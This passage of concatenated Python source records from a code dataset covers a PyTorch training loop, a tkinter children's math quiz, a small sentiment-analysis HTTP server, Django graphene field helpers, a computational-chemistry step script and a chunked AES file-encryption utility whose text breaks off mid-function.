use_pretrained:\n\t\tpretrained_file = 'attention_net__2.pth.tar'\n\n\t\tcheckpoint = torch.load(pretrained_file)\n\t\tresnet.load_state_dict(checkpoint['resnet'])\n\t\tif train_mode:\n\t\t\tepoch = checkpoint['epoch']+1\n\t\t\tuse_pretrained = False\n\t\t\toptimizer.load_state_dict(checkpoint['optimizer'])\n\n\tK = 0\n\n\tfor j in range(j_start,len(all_frames),batch_size):\n\n\t\tbatch_frames = all_frames[j : j + batch_size]\n\t\ttarget_numpy = np.empty((batch_size,no_of_AUs), dtype = np.float32)\n\n\t\tfor idx,name in enumerate(batch_frames):\n\t\t\timg = Image.open(name)\n\t\t\tpixels = preprocess(img)\n\t\t\tpixels = pixels.unsqueeze(0)\n\t\t\tinput = Variable(pixels).cuda()\n\t\t\tif idx == 0:\n\t\t\t\timage_batch = input\n\t\t\telse:\n\t\t\t\timage_batch = torch.cat((image_batch, input), 0)\n\t\t\tcsv_file = name[start_len:start_len+15]+'.csv'\n\t\t\tif(name[-6].isdigit()):\n\t\t\t\tframe_no = int(name[-6:-4])\n\t\t\telse:\n\t\t\t\tframe_no = int(name[-5:-4])\n\t\t\t# print(name, csv_file, frame_no)\n\n\t\t\tcsv_file_name = './processed/'+csv_file\n\t\t\tdf = pd.read_csv(csv_file_name)\n\t\t\t# print(df)\n\t\t\tdf = df.iloc[[frame_no-1],[5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21]]\n\t\t\t# print(df.values[0])\n\t\t\ttarget_numpy[idx] = df.values[0]\n\n\t\t\t# with open('./processed/'+csv_file, 'r') as csvfile:\n\t\t\t# \tcsvr = csv.reader(csvfile,quoting=csv.QUOTE_NONNUMERIC)\n\t\t\t# \tcsvr = list(csvr)\n\t\t\t# \tif len(csvr) <= frame_no:\n\t\t\t# \t\trow_no = len(csvr) - 1\n\t\t\t# \telse:\n\t\t\t# \t\trow_no = frame_no\n\n\t\t\t# \tprint(csvr[frame_no][5:22])\n\t\t\t# \ttarget_numpy[idx] = csvr[frame_no][5:22] # The 3rd row\n\t\t\t# \tprint(target_numpy)\n\n\n\t\t\t# for batch in range(batch_size):\n\t\t\t# \tif(emo_dict[name[-6:-3]] == emo_dict[vocal_mat_file[-10:-7]]):\n\t\t\t# \t\ttarget_numpy[batch] = emo_dict[vocal_mat_file[-10:-7]]\n\t\t\t# \telse:\n\t\t\t# \t\tprint(name)\n\t\t\t# \t\tsys.exit(\"Emotions don't match :( \")\n\n\t\t\t# start_frame = 0\n\t\t\t# end_frame = mid_frame + 22\n\t\t\t# # print(start_frame)\n\t\t\t# # print(end_frame)\n\t\t\t# for frame in range(start_frame,end_frame+1):\n\t\t\t# \tvisual_file = name + '_frame_' + str(frame)+'.jpg'\n\t\t\t# \timg = Image.open(visual_file)\n\t\t\t# \tpixels = preprocess(img)\n\t\t\t# \tpixels = pixels.unsqueeze(0)\n\t\t\t# \tinput = Variable(pixels).cuda()\n\t\t\t# \tif frame == start_frame:\n\t\t\t# \t\timage_batch = input\n\t\t\t# \telse:\n\t\t\t# \t\timage_batch = torch.cat((image_batch, input), 0)\n\t\tresnet_output = resnet(image_batch)\n\t\t# print(target_numpy)\n\n\t\t# print(resnet_output.size())\n\t\ttarget = Variable(torch.from_numpy(target_numpy)).cuda() \n\n\t\t# print(vocal_output.size())\n\t\t# print(vocal_mat_file)\n\t\t# print(name + '_frame_' + str(start_frame)+'.jpg')\n\n\t\tloss = criterion(resnet_output, target)\n\n\t\toptimizer.zero_grad()\n\t\tresnet.zero_grad()\n\n\t\tif train_mode:\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\n\t\trunning_loss += loss.data[0]\n\t\tK+=1\n\t\taverage_loss = float(running_loss)/float(K)\n\n\t\tprint('Training -- Epoch [%d], Sample [%d], Average Loss: %.4f'\n\t\t% (epoch+1, j+batch_size, average_loss))\n\t\tif (j+batch_size)%10000==0:\n\t\t\tsave_checkpoint({\n\t\t\t\t'epoch': epoch,\n\t\t\t\t'loss' : running_loss,\n\t\t\t\t'j_start' : 0,\n\t\t\t\t'resnet' : resnet.state_dict(),\n\t\t\t\t'optimizer': optimizer.state_dict(),\n\t\t\t}, False,'AU_net_iter_'+str(j+batch_size))\t\t\t\n\t'-------------------------------------------------Saving model after 
every epoch-----------------------------------'\n\tif train_mode:\n\t\tsave_checkpoint({\n\t\t\t'epoch': epoch,\n\t\t\t'loss' : running_loss,\n\t\t\t'j_start' : 0,\n\t\t\t'resnet' : resnet.state_dict(),\n\t\t\t'optimizer': optimizer.state_dict(),\n\t\t}, False,'AU_net_iter_')\n'------------------------------------------------------Saving model after training completion--------------------------'\nif train_mode:\n\tsave_checkpoint({\n\t\t'epoch': epoch,\n\t\t'loss' : running_loss,\n\t\t'correct' : running_corrects,\n\t\t'j_start' : 0,\n\t\t'resnet' : resnet.state_dict(),\n\t\t'optimizer': optimizer.state_dict(),\n\t}, False)","sub_path":"Paper/resnet_AUtraining.py","file_name":"resnet_AUtraining.py","file_ext":"py","file_size_in_byte":8217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"497143985","text":"\"\"\"\n\nVariables, as distinct from constants, change with the local environment. Defaults, if any, are established here if no\nvalue exists in the local environment.\n\n.. versionadded:: 0.34.0-d\n\n``PROJECT_ARCHIVE``\n-------------------\n\nDefault: ``$PROJECT_HOME/.archive``\n\nWhere projects are archived. Additional scripts may be written to further process projects in this directory.\n\n``PROJECT_HOME``\n----------------\n\nDefault: ``~/Work``\n\nWhere active projects are stored.\n\n``PROJECTS_ON_HOLD``\n--------------------\n\nDefault: ``$PROJECT_HOME/.hold``\n\nWhere inactive projects are stored.\n\n``PROJECT_TEMPLATE_PATH``\n-------------------------\n\nDefault: ``$PYTHON_HOME/bogeymin/templates``\n\n.. versionchanged:: 0.34.1-d\n These variables were migrated from ``constants``.\n\nThe path to project template files. Used by the ``project init`` command. This forms the basis for various other\ntemplate variables:\n\n- ``GITIGNORE_TEMPLATE``: The template used for creating a project's ``.gitignore`` file.\n- ``MANIFEST_TEMPLATE``: The template used for creating a project's ``MANIFEST.in`` file.\n- ``PROJECT_INI_TEMPLATE``: The template used for creating a project's ``project.ini`` file.\n- ``README_TEMPLATE``: The template used for creating a project's ``README.markdown`` file.\n- ``REQUIREMENTS_TEMPLATE``: The template used for creating a project's ``requirements.pip`` file. The default file is\n blank, but you may override the template to incorporate your own processing.\n\n\"\"\"\n# Imports\n\nimport os\n\n# NOTE: Since these are specific to each user, you *must* document the variables above. Otherwise the defaults will\n# appear in the documentation.\n__all__ = (\n \"GITIGNORE_TEMPLATE\",\n \"MANIFEST_TEMPLATE\",\n \"PROJECT_ARCHIVE\",\n \"PROJECT_HOME\",\n \"PROJECT_INI_TEMPLATE\",\n \"PROJECT_TEMPLATE_PATH\",\n \"PROJECTS_ON_HOLD\",\n \"README_TEMPLATE\",\n \"REQUIREMENTS_TEMPLATE\",\n)\n\n# Location of projects. User home is automatically expanded.\nPROJECT_HOME = os.environ.get(\"PROJECT_HOME\", os.path.expanduser(\"~/Work\"))\n\n# Location of archived projects.\nPROJECT_ARCHIVE = os.environ.get(\"PROJECT_ARCHIVE\", os.path.join(PROJECT_HOME, \".archive\"))\n\n# Location of projects on hold.\nPROJECTS_ON_HOLD = os.environ.get(\"PROJECTS_ON_HOLD\", os.path.join(PROJECT_HOME, \".hold\"))\n\n# Templates. 
Especially for project init.\nPROJECT_TEMPLATE_PATH = os.path.join(os.path.dirname(os.path.dirname(__file__)), \"templates\")\n\nGITIGNORE_TEMPLATE = os.path.join(PROJECT_TEMPLATE_PATH, \"gitignore.j2\")\n\nMANIFEST_TEMPLATE = os.path.join(PROJECT_TEMPLATE_PATH, \"manifest.in.j2\")\n\nPROJECT_INI_TEMPLATE = os.path.join(PROJECT_TEMPLATE_PATH, \"project.ini.j2\")\n\nREADME_TEMPLATE = os.path.join(PROJECT_TEMPLATE_PATH, \"readme.markdown.j2\")\n\nREQUIREMENTS_TEMPLATE = os.path.join(PROJECT_TEMPLATE_PATH, \"requirements.pip.j2\")\n","sub_path":"bogeymin/scraps/project/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"508496025","text":"#Matthew Lee\r\n#GUI Math Quiz Test v2.2 - 07/03/2021\r\n\r\n#IMPORTS\r\nimport random\r\nfrom tkinter import *\r\nfrom tkinter import Tk\r\n\r\n\r\n#FUNCTIONS\r\nclass Math():\r\n def __init__(self, parent):\r\n self.name = \"\"\r\n self.age = 0\r\n self.result = 0\r\n \r\n \"\"\"Welcome\"\"\"\r\n self.Welcome = Frame(parent)\r\n self.Welcome.grid(row=0, column=0)\r\n \r\n #title\r\n self.TitleLabel = Label(self.Welcome, text = \"Welcome\", \r\n bg = \"light blue\", fg = \"white\", width = 20, padx = 30, \r\n pady = 10, font = (\"comic sans ms\", \"14\", \"bold italic\"))\r\n self.TitleLabel.grid(row = 0, columnspan = 2)\r\n \r\n #Enter name - Label and Enter\r\n self.LabelName = Label(self.Welcome, text = \"Enter Name: \", \r\n fg = \"black\", padx = 5, pady = 5, \r\n font = (\"comic sans ms\", \"10\", \"bold italic\"))\r\n self.LabelName.grid(row = 1, column = 0)\r\n \r\n self.EnterName = Entry(self.Welcome)\r\n self.EnterName.grid(row = 1, column = 1)\r\n \r\n #Enter age - Label and Enter\r\n self.LabelAge = Label(self.Welcome, text = \"Enter Age: \", \r\n fg = \"black\", padx = 5, pady = 5,\r\n font = (\"comic sans ms\", \"10\", \"bold italic\"))\r\n self.LabelAge.grid(row = 2, column = 0)\r\n \r\n self.EnterAge = Entry(self.Welcome)\r\n self.EnterAge.grid(row = 2, column = 1)\r\n \r\n #Return\r\n self.Return = Label(self.Welcome, fg = \"red\",\r\n font = (\"comic sans ms\", \"10\", \"italic\"))\r\n self.Return.grid(row = 3, column = 1)\r\n self.Return.configure(text = \"\") \r\n \r\n #Difficulty Buttons\r\n self.LabelDiff = Label(self.Welcome, text = \"Select difficulty\", \r\n fg = \"black\", padx = 5, pady = 5,\r\n font = (\"comic sans ms\", \"10\", \"bold italic\"))\r\n self.LabelDiff.grid(row = 4, column = 0)\r\n #setup\r\n self.difficulty_list = [\"Easy\", \"Medium\", \"Hard\"]\r\n self.diff_lvl = StringVar()\r\n self.diff_lvl.set(0)\r\n self.diff_btns = []\r\n #Radio button creation\r\n for i in range(len(self.difficulty_list)):\r\n rb = Radiobutton(self.Welcome, variable = self.diff_lvl, value = i,\r\n text = self.difficulty_list[i], anchor = W, padx = 50, width = \"5\", height = \"2\")\r\n self.diff_btns.append(rb)\r\n rb.grid(row = i+5, column = 0, sticky = W)\r\n \r\n #Button to quiz\r\n self.Toquiz = Button(self.Welcome, text = \"Next\", \r\n activebackground = \"yellow\",\r\n command = lambda:[self.UserDetails(), self.QuestionGen()])\r\n self.Toquiz.grid(row = 8, column = 0)\r\n \r\n \r\n \"\"\"Quiz\"\"\"\r\n #set score\r\n global score\r\n global count\r\n \r\n score = 0\r\n count = 0\r\n \r\n self.Quiz = Frame(parent)\r\n #Title Banner\r\n self.TitleQuiz = Label(self.Quiz, text = \"Question 1 \\nScore: 0/5\", \r\n bg = \"light blue\", fg = \"white\", width = 20, padx = 30, \r\n pady = 10, font = (\"comic 
sans ms\", \"14\", \"bold italic\"))\r\n self.TitleQuiz.grid(row = 0, columnspan = 2)\r\n \r\n #Question\r\n self.Question = Label(self.Quiz, padx = 5, pady = 5, font = (\"comic sans ms\", \"10\"))\r\n self.Question.grid(row = 1, column = 0)\r\n \r\n #Answer box\r\n self.AnswerBox = Entry(self.Quiz)\r\n self.AnswerBox.grid(row = 1, column = 1)\r\n \r\n #Check Answer box\r\n self.ButtonCheck = Button(self.Quiz, text = \"Check Answer\",\r\n activebackground = \"yellow\",\r\n command = lambda:[self.Check()])\r\n self.ButtonCheck.grid(row = 2, column = 0)\r\n \r\n #Feedback\r\n self.feedback = Label(self.Quiz, padx = 5, pady = 5, font = (\"comic sans ms\", \"10\"))\r\n self.feedback.grid(row = 2, column = 1)\r\n \r\n \r\n \r\n \"\"\"Score\"\"\"\r\n self.Score_page = Frame(parent)\r\n #Title\r\n self.TitleScore = Label(self.Score_page, text = \"YOUR SCORE\", \r\n bg = \"light blue\", fg = \"white\", width = 20, padx = 30, \r\n pady = 10, font = (\"comic sans ms\", \"14\", \"bold italic\"))\r\n self.TitleScore.grid(row = 0, columnspan = 4)\r\n \r\n #Report\r\n Report_info = [\"Name\", \"Age\", \"Score\"]\r\n self.report_labels = []\r\n \r\n for i in range(len(Report_info)):\r\n ColumnHeading = Label(self.Score_page, text = Report_info[i], \r\n width = \"7\", height = \"2\", font = (\"comic sans ms\", \"14\", \"bold\"))\r\n self.report_labels.append(ColumnHeading)\r\n ColumnHeading.grid(row = 1, column = i)\r\n \r\n #User Details \r\n self.name_display = Label(self.Score_page, textvariable = self.name)\r\n self.name_display.grid(row = 2, column = 0)\r\n \r\n self.age_display = Label(self.Score_page, text = \"\")\r\n self.age_display.grid(row = 2, column = 1)\r\n \r\n self.result_display = Label(self.Score_page, text = \"\")\r\n self.result_display.grid(row = 2, column = 2)\r\n \r\n #Home Button\r\n self.ButtonHome = Button(self.Score_page, text = \"Home\",\r\n activebackground = \"yellow\", command = lambda:[self.ShowWelcome()])\r\n self.ButtonHome.grid(row = 3, column = 0) \r\n \r\n \r\n \r\n \"\"\"FUNCTIONS\"\"\" \r\n def End(self):\r\n #Should run when count reaches 5\r\n self.Quiz.grid_remove()\r\n \r\n self.name_display.configure(text = self.name)\r\n self.age_display.configure(text = self.age)\r\n self.result_display.configure(text = self.result)\r\n \r\n #Open score page\r\n self.Score_page.grid()\r\n \r\n def ShowQuiz(self):\r\n #Removes Welcome and plays \r\n self.Welcome.grid_remove()\r\n self.Quiz.grid()\r\n \r\n def ShowWelcome(self):\r\n #Clears user details for next user\r\n self.EnterName.delete(0, 'end')\r\n self.EnterAge.delete(0, 'end')\r\n #Removes Quiz and shows welcome\r\n self.Score_page.grid_remove()\r\n self.Welcome.grid()\r\n \r\n def UserDetails(self):\r\n #Check age\r\n if self.EnterName.get() == \"\":\r\n self.Return.configure(text = \"Please enter \\nyour name!\")\r\n else:\r\n try:\r\n if int(self.EnterAge.get()) <= 5:\r\n self.Return.configure(text = \"You're too young!\")\r\n elif int(self.EnterAge.get()) >= 16:\r\n self.Return.configure(text = \"You're too old!\")\r\n else:\r\n self.ShowQuiz()\r\n except ValueError:\r\n self.Return.configure(text = \"Please enter your \\nage in numbers\") \r\n \r\n \r\n def QuestionGen(self):\r\n #Generate questions\r\n #list\r\n num_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\n #Picks numbers\r\n self.number_1 = random.choice(num_list)\r\n self.number_2 = random.choice(num_list)\r\n self.total = self.number_1 + self.number_2\r\n self.add = self.number_1, \"+\", self.number_2, \"=\"\r\n #config\r\n self.Question.configure(text = 
self.add)\r\n \r\n def Check(self):\r\n global score\r\n global count\r\n try:\r\n self.answer = self.AnswerBox.get()\r\n self.answer_mod = int(self.answer)\r\n #Clears\r\n self.AnswerBox.delete(0, 'end')\r\n if self.answer_mod == self.total:\r\n self.feedback.configure(text = \"Correct!\")\r\n #Adds\r\n score += 1\r\n count += 1\r\n self.TitleQuiz.configure(text = \"Question {} \\nScore: {}/5\".format(count + 1, score))\r\n #Question count check\r\n if count == 5:\r\n #Collect Info\r\n self.name = self.EnterName.get()\r\n self.age = str(self.EnterAge.get())\r\n self.result = str(score)\r\n #reset\r\n score = 0\r\n count = 0\r\n self.End() \r\n else:\r\n self.QuestionGen()\r\n else:\r\n self.feedback.configure(text = \"Incorrect!\")\r\n count += 1\r\n self.TitleQuiz.configure(text = \"Question {} \\nScore: {}/5\".format(count + 1, score))\r\n if count == 5:\r\n #Collect Info\r\n self.name = self.EnterName.get()\r\n self.age = str(self.EnterAge.get())\r\n self.result = str(score)\r\n #reset\r\n score = 0\r\n count = 0 \r\n self.End() \r\n else:\r\n self.QuestionGen()\r\n except ValueError:\r\n self.feedback.configure(text = \"Please enter \\na number\")\r\n \r\n \r\n\"\"\"MAINLOOP\"\"\" \r\n#Begin code\r\nif __name__ == \"__main__\":\r\n root = Tk()\r\n frames = Math(root)\r\n root.title(\"Math quiz\")\r\n root.mainloop() ","sub_path":"GUI Math Quiz Test V2.3_Fixing loop (clear count and score).py","file_name":"GUI Math Quiz Test V2.3_Fixing loop (clear count and score).py","file_ext":"py","file_size_in_byte":9568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"530237301","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nimport json\nimport config\nimport sentimentAnalyze\nimport os\n\nclass SimpleHTTP(BaseHTTPRequestHandler):\n # Handles incoming GET requests.\n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def _set_cors_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')\n self.send_header(\"Access-Control-Allow-Headers\", \"Content-Type\")\n self.end_headers()\n\n def do_GET(self):\n self._set_headers()\n html = open(\"./client.html\")\n html = html.read()\n html = html.replace(\" < -- host -- >\",\n '%s:%s' % (config.server_ip, int(os.environ.get(\"PORT\", config.server_port))))\n # message = website\n # message = \"\"\"\n # 
Hello World!
\n # \"\"\"\n self.wfile.write(str.encode(html))\n # self.wfile.write(bytes(message, \"utf8\"))\n\n def do_HEAD(self):\n self._set_headers()\n\n def do_POST(self):\n # Handle the posted data\n # self._set_headers()\n # load database\n self._set_cors_headers()\n self.data_string = self.rfile.read(int(self.headers['Content-Length']))\n data = self.data_string.decode(\"utf-8\")\n # parse to json object\n obj = json.loads(data)\n\n # get data in sentence field\n sentence = obj[\"sentence\"]\n commentId = \"\"\n if \"commentId\" in obj and obj[\"commentId\"] != None:\n commentId = obj[\"commentId\"]\n print(\"receive : \",sentence, '- commentid : ', commentId)\n\n res = sentimentAnalyze.processing(sentence, commentId)\n # convert res to bytes\n res = str.encode(res)\n self.wfile.write(res)\n\n def do_OPTIONS(self):\n self._set_cors_headers()\n\n\ndef startServer(server_address):\n # server_address = ('127.0.0.1', 3333)\n # configure the host and port for the server\n\n # Initialize the server with the configuration above.\n httpd = HTTPServer(server_address, SimpleHTTP)\n\n print(\"Starting server\", server_address)\n\n # Start running the server\n httpd.serve_forever()\n\n\n# server_address = (config.server_ip, config.server_port)\nserver_address = (config.server_ip, int(os.environ.get(\"PORT\", config.server_port)))\nstartServer(server_address)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"602983967","text":"from django.db import models\n\nfrom ...core.types import Integer\nfrom ...core.types import Float\nfrom ...core.types import Boolean\nfrom ...core.types import String\nfrom ...core.types import List\nfrom ...core.types import NonNull\nfrom ...core.types import Field as VanillaField\nfrom ...core.types import FieldKernel as VanillaFieldKernel\nfrom .exceptions import NotAuthenticated\n\n\n# Helper functions\ndef create_field(field):\n\t\"\"\"\n\tTurns a Django field into the corresponding type of Graphene field.\n\t\"\"\"\n\tif field.__class__ is models.AutoField:\n\t\treturn field.name, Field(Integer.NonNull)\n\telif field.__class__ is models.IntegerField:\n\t\treturn field.name, Field(Integer if field.null else Integer.NonNull)\n\telif field.__class__ is models.FloatField:\n\t\treturn field.name, Field(Float if field.null else Float.NonNull)\n\telif field.__class__ is models.BooleanField:\n\t\treturn field.name, Field(Boolean if field.null else Boolean.NonNull)\n\telif field.__class__ is models.CharField:\n\t\treturn field.name, Field(String if field.null or field.blank else String.NonNull)\n\telif field.__class__ is models.ManyToOneRel:\n\t\treturn field.get_accessor_name(), OneToManyField(field)\n\telif field.__class__ is models.ForeignKey:\n\t\treturn field.name, ManyToOneField(field)\n\telse:\n\t\treturn field.name, None\n\n\n\n# Field kernel/shell\nclass FieldKernel(VanillaFieldKernel):\n\tdef check_permissions(self, root, user, method=''):\n\t\t\"\"\"\n\t\tEnsures that at least one of the model's permission classes will pass\n\t\tfor the given user.\n\t\t\"\"\"\n\t\tself.check_permissions_for_type(self.type, root, user, method)\n\t\t\n\tdef check_permissions_for_type(self, type, root, user, method):\n\t\tif type.__class__ in (NonNull, List):\n\t\t\tself.check_permissions_for_type(type._kernel.type, root, user, method)\n\t\telif hasattr(type._meta, 'permissions'):\n\t\t\tif (type._meta.permissions and\n\t\t\t\tnot 
any(x.has_permission(user, method=method) for x in type._meta.permissions)):\n\t\t\t\traise NotAuthenticated()\n\t\t\tfor selection in root.selection_set.selections:\n\t\t\t\tfield = type._kernel.fields.get(selection.name.value)\n\t\t\t\tif field:\n\t\t\t\t\tfield._kernel.check_permissions(selection, user, method=method)\n\n\n\n\tdef get_resolver_args(self, root):\n\t\t\"\"\"\n\t\tCompiles a list of fields that Django should prefetch when it fetches\n\t\tthe queryset for one of the top-level fields.\n\t\t\"\"\"\n\t\treturn self.get_resolver_args_for_type(self.type, root)\n\n\tdef get_resolver_args_for_type(self, type, root):\n\t\tif type.__class__ in (NonNull, List):\n\t\t\treturn self.get_resolver_args_for_type(type._kernel.type, root)\n\t\telif hasattr(type._kernel, 'fields'):\n\t\t\tselections = { x.name.value:x for x in root.selection_set.selections }\n\t\t\tfields = { k:type._kernel.fields.get(k) for k,v in selections.items() if type._kernel.fields.get(k) }\n\t\t\t\n\t\t\tmany_to_one = [ k for k,v in fields.items() if v.__class__ is ManyToOneField ]\n\t\t\tone_to_many = [ k for k,v in fields.items() if v.__class__ is OneToManyField ]\n\n\t\t\tfor k,v in fields.items():\n\t\t\t\targs = v._kernel.get_resolver_args(selections[k]) or {}\n\t\t\t\tmany_to_one += ['{}__{}'.format(k, x) for x in args.get('ManyToOne', [])]\n\t\t\t\tone_to_many += ['{}__{}'.format(k, x) for x in args.get('OneToMany', [])]\n\n\t\t\treturn {\n\t\t\t\t'ManyToOne': many_to_one,\n\t\t\t\t'OneToMany': one_to_many,\n\t\t\t}\n\nclass Field(VanillaField):\n\t__kernel__ = FieldKernel\n\n\tdef default_resolver(self):\n\t\tdef resolve_model_attribute(model):\n\t\t\ttry:\n\t\t\t\treturn getattr(model._source, self._kernel.name)\n\t\t\texcept KeyError:\n\t\t\t\traise ValueError(\"Field '{}' has no state and no resolve function\".format(self._kernel.name))\n\t\t\n\t\treturn resolve_model_attribute\n\n\n\n# Relational fields\nclass OneToManyField(Field):\n\tdef __init__(self, field, *args, **kwargs):\n\t\tmodel = kwargs.pop('model', None) or field.related_model\n\t\tkwargs['resolve'] = self.default_resolver()\n\t\tsuper(OneToManyField, self).__init__(NonNull(List(lambda: model.get_graphene_model())), *args, **kwargs)\n\t\tself._kernel.django_field = field\n\n\tdef default_resolver(self):\n\t\tdef resolve_one_to_many(model):\n\t\t\tgraphene_model = self._kernel.django_field.related_model.get_graphene_model()\n\t\t\tfield = getattr(model._source, self._kernel.django_field.get_accessor_name())\n\t\t\treturn [graphene_model(x) for x in field.all()]\n\t\t\n\t\treturn resolve_one_to_many\n\nclass ManyToOneField(Field):\n\tdef __init__(self, field, *args, **kwargs):\n\t\tmodel = kwargs.pop('model', None) or field.related_model\n\t\tkwargs['resolve'] = self.default_resolver()\n\t\tsuper(ManyToOneField, self).__init__(lambda: model.get_graphene_model(), *args, **kwargs)\n\t\tself._kernel.django_field = field\n\n\tdef default_resolver(self):\n\t\tdef resolve_many_to_one(model):\n\t\t\ttype = self._kernel.django_field.related_model.get_graphene_model()\n\t\t\treturn type(getattr(model._source, self._kernel.django_field.name))\n\n\t\treturn resolve_many_to_one\n","sub_path":"graphene/contrib/django/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"86676630","text":"import os\nimport sys\nimport time\nfrom liblibra_core import *\nfrom libra_py.workflows.nbra import step3\n\n# For excited states - Computing the 
excited states SDs and their overlaps and NACs\nparams_sd = {\n 'lowest_orbital': 12800-100, 'highest_orbital': 12800+1000,\n 'num_occ_states': 10, 'num_unocc_states': 10,\n 'isUKS': 0, 'number_of_states': 10, 'tolerance': 0.01, 'verbosity': 0, \n 'use_multiprocessing': True, 'nprocs': 12, \n 'is_many_body': False, 'time_step': 1.0, 'es_software': 'cp2k',\n 'path_to_npz_files': os.getcwd()+'/../../2_overlaps/10x10/res',\n 'logfile_directory': os.getcwd()+'/../../2_overlaps/10x10/all_logfiles',\n 'path_to_save_sd_Hvibs': os.getcwd()+'/res-mixed-basis-raw-ordered-identity',\n 'outdir': os.getcwd()+'/res-mixed-basis-raw-ordered-identity',\n 'start_time': 900, 'finish_time': 3099, 'sorting_type': 'identity',\n 'apply_phase_correction': True, 'apply_orthonormalization': True,\n 'do_state_reordering': 2, 'state_reordering_alpha':0\n }\n\nstep3.run_step3_sd_nacs_libint(params_sd)\n\n","sub_path":"3_nacs/10x10/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"353949813","text":"#! /usr/bin/env python3\n#NoGuiLinux\n\nimport json,random,os,base64,argparse,shutil,stat\ntry:\n from Cryptodome.Cipher import AES\nexcept:\n from Crypto.Cipher import AES\n\nclass Zero:\n def __init__(self):\n pass\n\n def encrypt(self,chunk,key,num,msg):\n cipher=AES.new(key,AES.MODE_EAX)\n nonce=cipher.nonce\n ciphertext,tag=cipher.encrypt_and_digest(chunk)\n #nonce,tag,len(ciphertext),data\n print(msg,'nonce: {}'.format(len(nonce)),'dataLen: {}'.format(len(ciphertext)),'tag: {}'.format(len(tag)),'chunk: {}'.format(num))\n return nonce,tag,len(ciphertext),key,ciphertext\n\n def jsonHandlerE_chunk(self,dataTuple):\n export={\n 'key':'',\n 'nonce':'',\n 'tag':'',\n 'len':0,\n }\n if len(dataTuple) == 5:\n export['key']=base64.b64encode(dataTuple[3]).decode()\n export['nonce']=base64.b64encode(dataTuple[0]).decode()\n export['tag']=base64.b64encode(dataTuple[1]).decode()\n export['len']=dataTuple[2]\n return export\n\n def randomKey(self):\n return os.urandom(32)\n\n def simpleRunE(self,key,datafile,eDatafile,keyfile,eKeyfile):\n if self.exists(datafile) == None:\n return None\n keyseg={}\n data={}\n num=0\n with open(eDatafile,'wb') as df:\n with open(datafile,'rb') as pt:\n while True:\n msg=pt.read(random.randint(8,1024))\n if not msg:\n break\n #for num,i in enumerate(msg):\n data=self.encrypt(msg,self.randomKey(),num,'{} -> {}'.format(datafile,eDatafile))\n keyseg[str(num)]=self.jsonHandlerE_chunk(data)\n df.write(data[-1])\n num+=1\n \n with open(keyfile,'w') as kf:\n json.dump(keyseg,kf) \n\n self.encrypt_key(key,keyfile,eKeyfile)\n os.remove(datafile)\n return True\n\n def encrypt_key(self,key,keyfile,eKeyfile):\n num=0\n with open(eKeyfile,'wb') as ekf:\n with open(keyfile,'rb') as kf:\n while True:\n d=kf.read(128)\n if not d:\n break\n res=self.encrypt(d,key,num,'{} -> {}'.format(keyfile,eKeyfile))\n ctext=res[0]+res[-1]+res[1]\n print('ctext: {}'.format(len(ctext)),'nonce {}'.format(len(res[0])),'data {}'.format(len(res[-1])),'tag {}'.format(len(res[1])))\n ekf.write(ctext)\n num+=1\n os.remove(keyfile)\n\n def decrypt_key(self,key,keyfile,eKeyfile):\n count=0\n with open(eKeyfile,'rb') as ekf, open(keyfile,'wb') as kf2:\n while True:\n d=ekf.read(16+128+16)\n if not d:\n break\n com={}\n com['nonce']=base64.b64encode(d[:16]).decode()\n if len(d) != (16+128+16):\n chunk=d[16:len(d)-16]\n else:\n chunk=d[16:128+16]\n com['tag']=base64.b64encode(d[128+16:]).decode()\n 
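# each encrypted chunk is framed as 16-byte nonce + up to 128 bytes of ciphertext + 16-byte tag (mirrors the layout written by encrypt_key)\n 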
com['key']=base64.b64encode(key).decode()\n res=self.decrypt(chunk,com,'{} -> {} : chunk {}'.format(eKeyfile,keyfile,count))\n kf2.write(res)\n count+=1\n os.remove(eKeyfile)\n\n def exists(self,name):\n if not os.path.exists(name):\n print('{} : does not exist'.format(name))\n return None\n elif not os.path.isfile(name):\n print('{} : not a file'.format(name))\n return None\n else:\n return True\n\n def simpleRunD(self,key,datafile,eDatafile,keyfile,eKeyfile): \n if self.exists(eDatafile) == None:\n return None\n\n self.decrypt_key(key,keyfile,eKeyfile)\n keyseg={}\n\n with open(datafile,'wb') as pt:\n with open(keyfile,'r') as kf:\n keyseg=json.load(kf)\n with open(eDatafile,'rb') as df:\n for i in keyseg.keys():\n chunk=df.read(int(keyseg[i]['len']))\n res=self.decrypt(chunk,keyseg[i],'{} -> {} : chunk {}'.format(eDatafile,datafile,i))\n pt.write(res)\n for i in [keyfile,eDatafile]:\n os.remove(i)\n\n return True\n \n def decrypt(self,chunk,dataDict,msg):\n nonce=base64.b64decode(dataDict['nonce'])\n tag=base64.b64decode(dataDict['tag'])\n key=base64.b64decode(dataDict['key'])\n cipher=AES.new(key,mode=AES.MODE_EAX,nonce=nonce)\n plaintext=cipher.decrypt(chunk)\n try:\n cipher.verify(tag)\n print('all good!',msg)\n except ValueError:\n print('chunk may be corrupted, or compromised!',msg)\n return plaintext\n\n def fixKey(self,key):\n try:\n if type(key) == type(str()):\n key=key.encode()\n if len(key) < 32:\n key=key+b' '*(32-len(key))\n elif len(key) > 32:\n print('warning: key is longer than supported (32 chars)... truncating to 32')\n key=key[:32]\n return key\n except:\n print('ERROR! 